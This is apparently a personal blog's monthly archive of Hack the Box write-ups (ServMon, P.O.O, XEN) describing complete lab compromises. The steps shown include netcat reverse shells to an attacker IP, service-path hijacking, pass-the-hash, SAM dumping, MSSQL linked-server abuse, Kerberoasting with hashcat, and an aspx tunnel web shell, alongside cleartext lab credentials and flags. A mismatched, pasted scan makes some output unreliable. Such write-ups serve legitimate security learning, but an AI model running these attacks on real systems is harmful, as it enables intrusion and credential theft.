Month: April 2020
Protected: htb-magic-nl
Protected: thm-steelmountain-nl
Protected: thm-vulnversity-nl
htb-servmon-nl
htb-servmon
As always we start with a nmap scan
We can ftp anonymous in and find, confidential.txt in ftp://10.10.10.184/Nathan
Nathan, I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder. Regards Nadine
LFI is https://www.exploit-db.com/exploits/47774
.so we have the passwords
L1k3B1gBut7s@W0rk is the pasword for user Nadine for service
ssh nadine@10.10.10.184 password with L1k3B1gBut7s@W0rk
next we upload nc.exe to box
then
https://www.exploit-db.com/exploits/46802
C:\Program Files\NSClient++>nscp web — password –display
Current password: ew2x6SsGTxjRwXOT
this password for login page on 8443 port
curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/testpuck.bat –data-binary “c:\temp\nc.exe 10.10.14.13 443 -e cmd.exe”
or run:
E:\PENTEST>psexec_windows -hashes :c8bbef7fd5afe37cbb1aee2264a75fee Administrator@10.10.10.184 Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation [*] Requesting shares on 10.10.10.184..... [*] Found writable share ADMIN$ [*] Uploading file TEhcBLUe.exe [*] Opening SVCManager on 10.10.10.184..... [*] Creating service Lofh on 10.10.10.184..... [*] Starting service Lofh..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.18363.752] (c) 2019 Microsoft Corporation. All rights reserved. C:\WINDOWS\system32>cd c:\users\administrator\desktop c:\Users\Administrator\Desktop>dir Volume in drive C has no label. Volume Serial Number is 728C-D22C Directory of c:\Users\Administrator\Desktop 08/04/2020 23:12 <DIR> . 08/04/2020 23:12 <DIR> .. 15/04/2020 05:58 34 root.txt 1 File(s) 34 bytes 2 Dir(s) 27,399,426,048 bytes free c:\Users\Administrator\Desktop>type root.txt 62fb102b67c0760ac03f1cf05616dc65
c:\Temp>cqh -samdump SAM hashes: Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Nadine:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Nathan:1004:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Other way:
Enumerate the current user and find that the “Server Operators” user group can read and write system services, and can change services with System permissions and start. Here comes the idea: find a system permission service that has not been started, modify the content to Trojan or nc, and then execute:
*Evil-WinRM* PS C:\temp> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SensorDataService" /v ImagePath /t REG_EXPAND_SZ /d "C:\Windows\Temp\nc.exe 10.10.14.13 9876 -e cmd" /f The operation completed successfully. *Evil-WinRM* PS C:\temp> sc.exe start SensorDataService
C:\Users\jacco>nc -nlvp 9876 listening on [any] 9876 ... connect to [10.10.14.13] from (UNKNOWN) [10.10.10.184] 49687 Microsoft Windows [Version 10.0.18363.752] (c) 2019 Microsoft Corporation. All rights reserved. C:\WINDOWS\system32>whoami whoami nt authority\system C:\WINDOWS\system32>hostname hostname ServMon C:\WINDOWS\system32>
…
Author : Puckiestyle
Protected: htb-forwardslash-private
htb-endgame-poo
Hack the Box – P.O.O ( writeup as of box retired by june 2020 )
As normal I add the IP of the machine 10.13.38.11 to /etc/hosts as poo.htb
NMAP
To start off with, I perform a port discovery to see what I could find.
nmap -p- -sT -sV -sC -oN initial-scan 10.13.38.11
E:\PENTEST>nmap -A -oN htb-endgame-xen 10.13.38.12 Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-09 14:41 W. Europe Summer Time Stats: 0:00:43 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 66.67% done; ETC: 14:42 (0:00:11 remaining) Nmap scan report for humongousretail.com (10.13.38.12) Host is up (0.024s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 25/tcp open smtp | fingerprint-strings: | GenericLines, GetRequest: | 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL) | sequence of commands | sequence of commands | Hello: | 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL) | EHLO Invalid domain address. | Help: | 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL) | DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY | NULL: |_ 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL) | smtp-commands: CITRIX, SIZE 20480000, AUTH LOGIN, HELP, |_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: Humongous Retail 443/tcp open ssl/http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: Humongous Retail | ssl-cert: Subject: commonName=humongousretail.com | Subject Alternative Name: DNS:humongousretail.com | Not valid before: 2019-03-31T21:05:35 |_Not valid after: 2039-03-31T21:15:35 |_ssl-date: 2020-04-09T12:42:58+00:00; +9s from scanner time. | sslv2: | SSLv2 supported | ciphers: | SSL2_RC4_128_WITH_MD5 |_ SSL2_DES_192_EDE3_CBC_WITH_MD5 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port25-TCP:V=7.70%I=7%D=4/9%Time=5E8F182C%P=i686-pc-windows-windows%r(N SF:ULL,33,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LO SF:CAL\)\r\n")%r(Hello,55,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(E SF:XCHANGE\.HTB\.LOCAL\)\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\ SF:r\n")%r(Help,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE SF:\.HTB\.LOCAL\)\r\n211\x20DATA\x20HELO\x20EHLO\x20MAIL\x20NOOP\x20QUIT\x SF:20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n")%r(GenericLines,6F,"220\x20 SF:ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x2 SF:0Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20c SF:ommands\r\n")%r(GetRequest,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready SF:\x20\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x20Bad\x20sequence\x20of\x20command SF:s\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n"); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: specialized|general purpose|phone Running (JUST GUESSING): Microsoft Windows 7|8|Phone|2008|8.1|Vista (91%) OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 Aggressive OS guesses: Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows Phone 7.5 or 8.0 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (90%), Microsoft Windows 7 (90%), Microsoft Windows 7 Professional or Windows 8 (90%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 8s, deviation: 0s, median: 8s TRACEROUTE (using port 443/tcp) HOP RTT ADDRESS 1 24.00 ms 10.14.14.1 2 24.00 ms humongousretail.com (10.13.38.12) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 60.99 seconds
It seems we have discovered a few ports open. I chose not to perform a UDP scan at this point in the exercise. It seems we have HTTP on port 80 and MSSQL on 1433.
Overview of Web Services
Let’s take a quick look at the webpages to see what we have. I got the following on port 80.
I didn’t have much to go on, so I decided to do some directory enumeration.
Directory Enumeration
I used wfuzz in this case because gobuster didn’t come up with anything useful.
wfuzz –hc 404 -w raft-small-words.txt http://10.13.38.11/FUZZ
wfuzz --hc 404 -w /usr/share/seclists/Discovery/Web-Content/SVNDigger/all.txt http://poo.htb/FUZZ
The interesting ones for me to look at seemed to be the ‘admin’ folder and ‘.DS_Store’ file. Simply because admin indicates an area of privilege and .DS_Store files generally hold information about the folder that it resides in.
Admin Directory
I browsed to http://10.13.38.11/admin and was presented with a logon.
I chose not to try and brute force this at this point and looked at the other files I could potentially utilise.
Reading Directories
Knowing the DS_Store files contain information, I read the file to see what it contained. I did this by using https://github.com/lijiejie/ds_store_exp
python ds_store_exp.py http://10.13.38.11/.DS_Store
We have some interesting directories. I run IIS Shortname scanner located at https://github.com/irsdl/IIS-ShortName-Scanner to see if I could come up with anything interesting and one specific directory came up with good information.
java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/
I tried a couple of filenames and then hit the jackpot with poo_connection.txt.
This seemed to be details to a SQL database. And we have our first flag.
POO{fcfb0767f5bd3cbc22f40ff5011ad555}
SERVER=10.13.38.11
USERID=external_user
DBNAME=POO_PUBLIC
USERPWD=#p00Public3xt3rnalUs3r#
Flag : POO{fcfb0767f5bd3cbc22f40ff5011ad555}
SQL Access
For SQL access, I booted up my Windows machine and used SQL Management studio. I attempted to log in with the details that we found.
And we have a successful login.
I then proceeded to create a new user puckie for myself.
Now that I had created the user, I attempted to log in as the new user.
Now that I was logged in as a new user, I could see we had an additional database called flag.
USE flag Select * FROM dbo.flag
This gave us another flag.
POO{88d829eb39f2d11697e689d779810d42}
Creating an sql user puckie in sql studio
EXEC ('select current_user') at [COMPATIBILITY\POO_CONFIG];
EXEC ('select name,sysadmin from syslogins') at [COMPATIBILITY\POO_CONFIG];
EXEC ('select srvname,isremote from sysservers') at [COMPATIBILITY\POO_CONFIG];
EXEC ('EXEC (''select suser_name()'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
EXEC ('EXEC (''EXEC sp_addlogin ''''puckie'''', ''''abc123!'''''') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
EXEC ('EXEC (''EXEC sp_addsrvrolemember ''''puckie'''', ''''sysadmin'''''') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
SHELL Access
I needed to enable xp_cmdshell
Now that I had sysadmin rights on the box, I decided to use https://alamot.github.io/mssql_shell/ to try and gain a shell on the box.
python3 mssql_shell.py from https://github.com/puckiestyle/python/blob/master/mssql_shell.py
I was unable to read anything from the web.config file. I tried to output it but got Access Denied.
After a little bit of looking around on the system, I noticed that Python seems to be installed on the system.
xp_cmdshell whoami
EXEC sp_execute_external_script @language = N'Python', @script = N'import os;os.system("whoami");';
EXEC sp_execute_external_script @language = N'Python', @script = N'import os;os.system("type c:\inetpub\wwwroot\web.config");';
Admin Page
Finding this easier to do within SQL Management Studio, I tried reading the contents of the web.config file.
And this gave us the contents of the config file which showed a username and password.
Administrator EverybodyWantsToWorkAtP.O.O.
I immediately went back to the admin page and attempted to log in with the details shown.
A successful login to the page revealed the next flag.
POO{4882bd2ccfd4b5318978540d9843729f}
IPv6 and WinRM
I tried everything to get a good reverse shell on the box, but it seemed the firewall was blocking all traffic.
netsh advfirewall firewall show rule name=”Block network access for R local user accounts in SQL Server instance POO_PUBLIC”
And then I noticed an IPv6 address and another adapter.
I performed an additional scan on the IPv6 address.
kali@kali:~/htb$ nmap -p- -6 -oN ipv6-scan dead:babe::1001 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-16 05:40 EDT Stats: 0:00:16 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 9.44% done; ETC: 05:43 (0:02:34 remaining) Nmap scan report for dead:babe::1001 Host is up (0.026s latency). Not shown: 65532 filtered ports PORT STATE SERVICE 80/tcp open http 1433/tcp open ms-sql-s 5985/tcp open wsman Nmap done: 1 IP address (1 host up) scanned in 104.66 seconds
I noticed there was an additional port open. We have WinRM on 5985. I had credentials and now tried to access this through WinRM. I made the necessary changes to my hosts file first.
dead:babe::1001 poov6.htb
I decided to use alamot winrm located at https://github.com/Alamot/code-snippets/blob/master/winrm/winrm_shell_with_upload.rb for this.
I changed the required fields and attempted to connect.
ruby winrm_shell_with_upload.rb
Or use Evil-winrm to find the 4th flag
kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i poov6.htb -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.'
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type flag.txt
POO{ff87c4fe10e2ef096f9a96a01c646f8f}
I wanted to see what I could find out about the domain. Knowing that it is on a domain, I was hoping for some Kerberos tokens that I could potentially crack. I would have to utilise the MSSQL account that I had created earlier..
Kerberoasting
I logged back in through the SQL Shell that I had earlier.
powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('c:\temp\kerberoasting.ps1');Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat
This come back with 2 accounts.
This one was named p00_hr.
This one was named p00_adm.
I copied the contents of these tokens to separate files named user-p00_hr and user-p00_adm.
Now I had to try and crack the passwords on these.
Hashcat
I proceeded to run these 2 tokens through hashcat and run them with the best64 rule.
hashcat -m 13100 -a 0 --outfile hr.txt p00_adm.txt rockyou.txt --force -r /usr/share/hashcat/rules/best64.rule
The p00_hr account came back quickly.
p00_hr:Password123!
However, when I run the p00_adm account through rockyou, it did not return any results. I then decided to run the token through all passwords found in all text files that lay within the SecLists folders.
hashcat -m 13100 -a 0 --outfile hr.txt p00_adm.txt /opt/SecLists/Passwords/*.txt --force -r /usr/share/hashcat/rules/best64.rule
And this eventually found a result in the Keyboard-Combinations.txt file.
p00_adm:ZQ!5t4r
Now that I had both these passwords cracked. I needed to try and gain access to the domain controller which was on 172.20.128.53.
Domain details
I now uploaded PowerView.ps1 to the temp folder and imported it into PowerShell.
Import-Module .\PowerView.ps1
Once I had created all the variables necessary, I then tried to get the user information on the domain.
get-netuser -DomainController dc -Credential $cred
Looking through the list of users on the domain, I noticed one which was interesting.
This was an account names mr3ks
PowerView / Domain Password
After looking at the powerview version that I was using, I found another version that seemed a little more user friendly at https://github.com/EmpireProject/Empire/blob/master/data/module_source/situational_awareness/network/powerview.ps1
This also gave me the option to set domain user passwords. I was not aware if I had the relevant permissions to set a user password yet, but I thought I would give it a shot.
UPLOAD /opt/htb/endgame/poo/sdup.ps1 c:\temp\sdup.ps1 Import-Module .\PowerView.ps1 $Username = 'p00_adm' $Password = 'ZQ!5t4r' $pass = ConvertTo-SecureString -AsPlainText $Password -Force $Cred = New-Object System.Management.Automation.PSCredential -ArgumentList $Username,$pass Set-DomainUserPassword -Identity mr3ks -Password $pass -Credential $Cred
I didn’t get an error from this; therefore, I can only assume at this point that the password change has been successful. I tried to connect via PowerShell but this did not seem to want to connect.
reGeorg
I was now forced to try and get a tunnel running to see if this would help with the WinRM situation. I uploaded the aspx shell into the root folder
UPLOAD /opt/tunnels/tunnel.aspx c:\inetpub\wwwroot\shell.aspx
I then browsed to the tunnel to see if it would activate.
To my surprise, it worked. Now for me to create my tunnel with reGeorge.
python ./reGeorgSocksProxy.py -p 10000 -u http://10.13.38.11/tunnel.aspx
I knew the IP of the Domain Controller from earlier, therefore I changed the WinRM scripts to reflect this and input the mr3ks username and password.
proxychains ruby winrmdc_shell_with_ipload.rb
This provided me with Direct access to the Domain Controller as a domain admin.
I could now look for the final flag.
POO{1196ef8bc523f084ad1732a38a0851d6}
This exercise got me from being on the outside of the network with simply HTTP and MSSQL as the open ports, to then being able to take complete control of the domain.
Notes
If aspx or asp files fail to execute, look at the operating system. In this case it was 2016.
(get-wmiobject win32_operatingsystem).name
If this is the case, and you have admin rights like we did here, then you can install the .NET tools to get the aspx executing. To do this, in a shell, simply type;
dism /online /enable-feature /featurename:NerFx4Extended-ASPNET45 -All
…..extra…
kali@kali:~/htb$ python mssqlclient.py -p 1433 external_user:#p00Public3xt3rnalUs3r#@10.13.38.11
Impacket v0.9.22.dev1+20200327.103853.7e505892 - Copyright 2020 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'master'.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 7235)
[!] Press help for extra shell commands
SQL> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd
SQL>
.
msf5 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set password #p00Public3xt3rnalUs3r# password => #p00Public3xt3rnalUs3r# msf5 auxiliary(admin/mssql/mssql_enum_domain_accounts) > run [*] Running module against 10.13.38.11 [*] 10.13.38.11:1433 - Attempting to connect to the database server at 10.13.38.11:1433 as external_user... [+] 10.13.38.11:1433 - Connected. [*] 10.13.38.11:1433 - SQL Server Name: COMPATIBILITY [*] 10.13.38.11:1433 - Domain Name: POO [+] 10.13.38.11:1433 - Found the domain sid: 010500000000000515000000af91e18f681dda440dfef7b0 [*] 10.13.38.11:1433 - Brute forcing 10000 RIDs through the SQL Server, be patient... [*] 10.13.38.11:1433 - - POO\Administrator [*] 10.13.38.11:1433 - - POO\Guest [*] 10.13.38.11:1433 - - POO\krbtgt [*] 10.13.38.11:1433 - - POO\DefaultAccount [*] 10.13.38.11:1433 - - POO\Domain Admins [*] 10.13.38.11:1433 - - POO\Domain Users [*] 10.13.38.11:1433 - - POO\Domain Guests [*] 10.13.38.11:1433 - - POO\Domain Computers [*] 10.13.38.11:1433 - - POO\Domain Controllers [*] 10.13.38.11:1433 - - POO\Cert Publishers [*] 10.13.38.11:1433 - - POO\Schema Admins [*] 10.13.38.11:1433 - - POO\Enterprise Admins [*] 10.13.38.11:1433 - - POO\Group Policy Creator Owners [*] 10.13.38.11:1433 - - POO\Read-only Domain Controllers [*] 10.13.38.11:1433 - - POO\Cloneable Domain Controllers [*] 10.13.38.11:1433 - - POO\Protected Users [*] 10.13.38.11:1433 - - POO\Key Admins [*] 10.13.38.11:1433 - - POO\Enterprise Key Admins [*] 10.13.38.11:1433 - - POO\RAS and IAS Servers [*] 10.13.38.11:1433 - - POO\Allowed RODC Password Replication Group [*] 10.13.38.11:1433 - - POO\Denied RODC Password Replication Group [*] 10.13.38.11:1433 - - POO\mr3ks [*] 10.13.38.11:1433 - - POO\DC$ [*] 10.13.38.11:1433 - - POO\DnsAdmins [*] 10.13.38.11:1433 - - POO\DnsUpdateProxy [*] 10.13.38.11:1433 - - POO\COMPATIBILITY$ [*] 10.13.38.11:1433 - - POO\p00_hr [*] 10.13.38.11:1433 - - POO\p00_dev [*] 10.13.38.11:1433 - - POO\p00_adm [*] 10.13.38.11:1433 - - POO\P00 Help Desk [+] 10.13.38.11:1433 - 31 user accounts, groups, and computer accounts were found. [*] 10.13.38.11:1433 - Query results have been saved to: /home/kali/.msf4/loot/20200416050427_default_10.13.38.11_mssql.domain.acc_738433.txt [*] Auxiliary module execution completed
msf5 auxiliary(admin/mssql/mssql_enum) > set password #p00Public3xt3rnalUs3r# password => #p00Public3xt3rnalUs3r# msf5 auxiliary(admin/mssql/mssql_enum) > set rhosts 10.13.38.11 rhosts => 10.13.38.11 msf5 auxiliary(admin/mssql/mssql_enum) > set username external_user username => external_user msf5 auxiliary(admin/mssql/mssql_enum) > run [*] Running module against 10.13.38.11 [*] 10.13.38.11:1433 - Running MS SQL Server Enumeration... [*] 10.13.38.11:1433 - Version: [*] Microsoft SQL Server 2017 (RTM-GDR) (KB4505224) - 14.0.2027.2 (X64) [*] Jun 15 2019 00:26:19 [*] Copyright (C) 2017 Microsoft Corporation [*] Standard Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor) [*] 10.13.38.11:1433 - Configuration Parameters: [*] 10.13.38.11:1433 - C2 Audit Mode is Not Enabled [*] 10.13.38.11:1433 - xp_cmdshell is Enabled [*] 10.13.38.11:1433 - remote access is Enabled [*] 10.13.38.11:1433 - allow updates is Not Enabled [*] 10.13.38.11:1433 - Database Mail XPs is Not Enabled [*] 10.13.38.11:1433 - Ole Automation Procedures are Not Enabled [*] 10.13.38.11:1433 - Databases on the server: [*] 10.13.38.11:1433 - Database name:master [*] 10.13.38.11:1433 - Database Files for master: [*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\master.mdf [*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\mastlog.ldf [*] 10.13.38.11:1433 - Database name:tempdb [*] 10.13.38.11:1433 - Database Files for tempdb: [*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb.mdf [*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\templog.ldf [*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb_mssql_2.ndf [*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb_mssql_3.ndf [*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb_mssql_4.ndf [*] 10.13.38.11:1433 - Database name:POO_PUBLIC [*] 10.13.38.11:1433 - Database Files for POO_PUBLIC: [*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\poo_public_dat.mdf [*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\poo_public_log.ldf [*] 10.13.38.11:1433 - System Logins on this Server: [*] 10.13.38.11:1433 - sa [*] 10.13.38.11:1433 - external_user [*] 10.13.38.11:1433 - Disabled Accounts: [*] 10.13.38.11:1433 - No Disabled Logins Found [*] 10.13.38.11:1433 - No Accounts Policy is set for: [*] 10.13.38.11:1433 - All System Accounts have the Windows Account Policy Applied to them. [*] 10.13.38.11:1433 - Password Expiration is not checked for: [*] 10.13.38.11:1433 - sa [*] 10.13.38.11:1433 - external_user [*] 10.13.38.11:1433 - System Admin Logins on this Server: [*] 10.13.38.11:1433 - sa [*] 10.13.38.11:1433 - Windows Logins on this Server: [*] 10.13.38.11:1433 - No Windows logins found! [*] 10.13.38.11:1433 - Windows Groups that can logins on this Server: [*] 10.13.38.11:1433 - No Windows Groups where found with permission to login to system. [*] 10.13.38.11:1433 - Accounts with Username and Password being the same: [*] 10.13.38.11:1433 - No Account with its password being the same as its username was found. [*] 10.13.38.11:1433 - Accounts with empty password: [*] 10.13.38.11:1433 - No Accounts with empty passwords where found. [*] 10.13.38.11:1433 - Stored Procedures with Public Execute Permission found: [*] 10.13.38.11:1433 - sp_replsetsyncstatus [*] 10.13.38.11:1433 - sp_replcounters [*] 10.13.38.11:1433 - sp_replsendtoqueue [*] 10.13.38.11:1433 - sp_resyncexecutesql [*] 10.13.38.11:1433 - sp_prepexecrpc [*] 10.13.38.11:1433 - sp_repltrans [*] 10.13.38.11:1433 - sp_xml_preparedocument [*] 10.13.38.11:1433 - xp_qv [*] 10.13.38.11:1433 - xp_getnetname [*] 10.13.38.11:1433 - sp_releaseschemalock [*] 10.13.38.11:1433 - sp_refreshview [*] 10.13.38.11:1433 - sp_replcmds [*] 10.13.38.11:1433 - sp_unprepare [*] 10.13.38.11:1433 - sp_resyncprepare [*] 10.13.38.11:1433 - sp_createorphan [*] 10.13.38.11:1433 - xp_dirtree [*] 10.13.38.11:1433 - sp_replwritetovarbin [*] 10.13.38.11:1433 - sp_replsetoriginator [*] 10.13.38.11:1433 - sp_xml_removedocument [*] 10.13.38.11:1433 - sp_repldone [*] 10.13.38.11:1433 - sp_reset_connection [*] 10.13.38.11:1433 - xp_fileexist [*] 10.13.38.11:1433 - xp_fixeddrives [*] 10.13.38.11:1433 - sp_getschemalock [*] 10.13.38.11:1433 - sp_prepexec [*] 10.13.38.11:1433 - xp_revokelogin [*] 10.13.38.11:1433 - sp_execute_external_script [*] 10.13.38.11:1433 - sp_resyncuniquetable [*] 10.13.38.11:1433 - sp_replflush [*] 10.13.38.11:1433 - sp_resyncexecute [*] 10.13.38.11:1433 - xp_grantlogin [*] 10.13.38.11:1433 - sp_droporphans [*] 10.13.38.11:1433 - xp_regread [*] 10.13.38.11:1433 - sp_getbindtoken [*] 10.13.38.11:1433 - sp_replincrementlsn [*] 10.13.38.11:1433 - Instances found on this server: [*] 10.13.38.11:1433 - Default Server Instance SQL Server Service is running under the privilege of: [*] 10.13.38.11:1433 - xp_regread might be disabled in this system [*] Auxiliary module execution completed msf5 auxiliary(admin/mssql/mssql_enum) >
Author – Puckiestyle
htb-endgame-xen
Hack the Box – XEN ( retired june 2020 )
1st I add the IP of the machine 10.13.38.12 to /etc/hosts as xen.htb
NMAP
As always we start with a nmap scan
E:\PENTEST>nmap -A -oN htb-endgame-xen 10.13.38.12 Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-09 14:41 W. Europe Summer Time Stats: 0:00:43 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 66.67% done; ETC: 14:42 (0:00:11 remaining) Nmap scan report for humongousretail.com (10.13.38.12) Host is up (0.024s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 25/tcp open smtp | fingerprint-strings: | GenericLines, GetRequest: | 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL) | sequence of commands | sequence of commands | Hello: | 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL) | EHLO Invalid domain address. | Help: | 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL) | DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY | NULL: |_ 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL) | smtp-commands: CITRIX, SIZE 20480000, AUTH LOGIN, HELP, |_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: Humongous Retail 443/tcp open ssl/http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: Humongous Retail | ssl-cert: Subject: commonName=humongousretail.com | Subject Alternative Name: DNS:humongousretail.com | Not valid before: 2019-03-31T21:05:35 |_Not valid after: 2039-03-31T21:15:35 |_ssl-date: 2020-04-09T12:42:58+00:00; +9s from scanner time. | sslv2: | SSLv2 supported | ciphers: | SSL2_RC4_128_WITH_MD5 |_ SSL2_DES_192_EDE3_CBC_WITH_MD5 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port25-TCP:V=7.70%I=7%D=4/9%Time=5E8F182C%P=i686-pc-windows-windows%r(N SF:ULL,33,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LO SF:CAL\)\r\n")%r(Hello,55,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(E SF:XCHANGE\.HTB\.LOCAL\)\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\ SF:r\n")%r(Help,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE SF:\.HTB\.LOCAL\)\r\n211\x20DATA\x20HELO\x20EHLO\x20MAIL\x20NOOP\x20QUIT\x SF:20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n")%r(GenericLines,6F,"220\x20 SF:ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x2 SF:0Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20c SF:ommands\r\n")%r(GetRequest,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready SF:\x20\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x20Bad\x20sequence\x20of\x20command SF:s\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n"); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 